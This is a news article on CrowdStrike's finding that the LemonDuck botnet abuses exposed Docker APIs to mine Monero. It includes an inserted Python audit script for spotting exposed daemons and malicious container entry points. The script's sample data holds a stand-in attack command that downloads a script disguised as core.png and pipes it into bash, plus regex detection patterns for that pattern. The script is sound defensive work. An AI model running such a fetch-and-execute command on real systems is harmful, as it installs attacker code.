
New botnet exploits Docker containers

According to researchers at CrowdStrike, a newly discovered botnet abuses exposed Docker APIs to compromise systems, including Microsoft Exchange servers.

It appears that an unknown threat actor is using the LemonDuck crypto-mining botnet, which targets Exchange servers via ProxyLogon, to mine cryptocurrency.

After scanning for exposed Docker APIs that permit unauthorized access, the attacker runs a malicious container whose custom entry point downloads a Bash script disguised as an image file named core.png.

After gaining initial access to server resources, the attacker can use known exploits to escalate privileges and install crypto miners while spreading across the network. They can also drop files that evade detection by any antivirus scanners installed on the compromised machines.
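A defensive audit of the two conditions the chain above depends on, a Docker API reachable over plain TCP and a container whose entry point fetches and executes a script hidden behind an image extension, written as an added Python example that is not code from the article or from CrowdStrike. The daemon.json keys (hosts, tlsverify, tlscacert, tlscert, tlskey) and the docker inspect fields (Config.Entrypoint, Config.Cmd, HostConfig.Binds, HostConfig.Privileged) are real; the sample configurations, container records, container ids and the 203.0.113.10 address are constructed for the example.

```python
"""Flag an exposed Docker daemon and containers that match the LemonDuck
entry-point pattern (download a fake image, pipe it into a shell).
All sample data below is constructed; nothing is read from a live host."""
import re

# Constructed daemon.json fragments: one exposing the API without TLS,
# one using the documented TLS client-verification keys.
DAEMON_CONFIGS = {
    "insecure": {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]},
    "hardened": {
        "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
        "tlsverify": True,
        "tlscacert": "/etc/docker/ca.pem",
        "tlscert": "/etc/docker/server-cert.pem",
        "tlskey": "/etc/docker/server-key.pem",
    },
}

# Constructed `docker inspect`-style records, trimmed to the fields used here.
CONTAINERS = [
    {
        "Id": "c1",
        "Config": {
            "Image": "alpine",
            "Entrypoint": ["sh", "-c", "wget -qO- http://203.0.113.10/core.png | bash"],
        },
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
    },
    {
        "Id": "c2",
        "Config": {
            "Image": "nginx:1.25",
            "Entrypoint": ["/docker-entrypoint.sh"],
            "Cmd": ["nginx", "-g", "daemon off;"],
        },
        "HostConfig": {"Binds": [], "Privileged": False},
    },
]

# A URL whose path ends in an image extension, and a download tool piped into a shell.
IMAGE_EXT_URL = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|ico|bmp)\b", re.I)
DOWNLOAD_AND_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")


def exposed_api_findings(daemon_cfg):
    """Report TCP listeners that are not protected by TLS client verification."""
    findings = []
    for host in daemon_cfg.get("hosts", []):
        if host.startswith("tcp://") and not daemon_cfg.get("tlsverify"):
            findings.append(f"Docker API listens on {host} without tlsverify")
    return findings


def container_findings(container):
    """Report entry-point and host-config traits seen in the described attack."""
    cfg = container.get("Config", {})
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    findings = []
    if DOWNLOAD_AND_EXEC.search(cmdline):
        findings.append("entry point downloads remote content and pipes it to a shell")
    if IMAGE_EXT_URL.search(cmdline):
        findings.append("entry point fetches a URL with an image extension (possible disguised script)")
    host_cfg = container.get("HostConfig", {})
    for bind in host_cfg.get("Binds", []):
        if bind.split(":")[0] == "/":  # host root mounted into the container
            findings.append("host root filesystem is bind-mounted")
    if host_cfg.get("Privileged"):
        findings.append("container runs privileged")
    return findings


def audit(daemon_cfg, containers):
    """Combine daemon and per-container findings into one report dict."""
    report = {"daemon": exposed_api_findings(daemon_cfg), "containers": {}}
    for container in containers:
        hits = container_findings(container)
        if hits:
            report["containers"][container["Id"]] = hits
    return report


if __name__ == "__main__":
    for name, cfg in DAEMON_CONFIGS.items():
        print(name, audit(cfg, CONTAINERS))
```

On a real host the same functions can be fed the parsed output of `docker inspect $(docker ps -aq)` and the contents of /etc/docker/daemon.json; the regexes are deliberately narrow to the pattern described in the article, so treat a hit as a lead for investigation rather than a verdict.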

The attackers use XMRig to mine Monero, a privacy-oriented cryptocurrency that is claimed to be very difficult to trace.

Security researchers from CrowdStrike also said that LemonDuck comes with a file called “a.asp” which can disable the aliyun service on Alibaba Cloud in order to avoid detection.

With the rising price of cryptocurrencies in the past few years, crypto miners have become extremely popular, especially since the mined coins can be sold easily on many crypto markets.
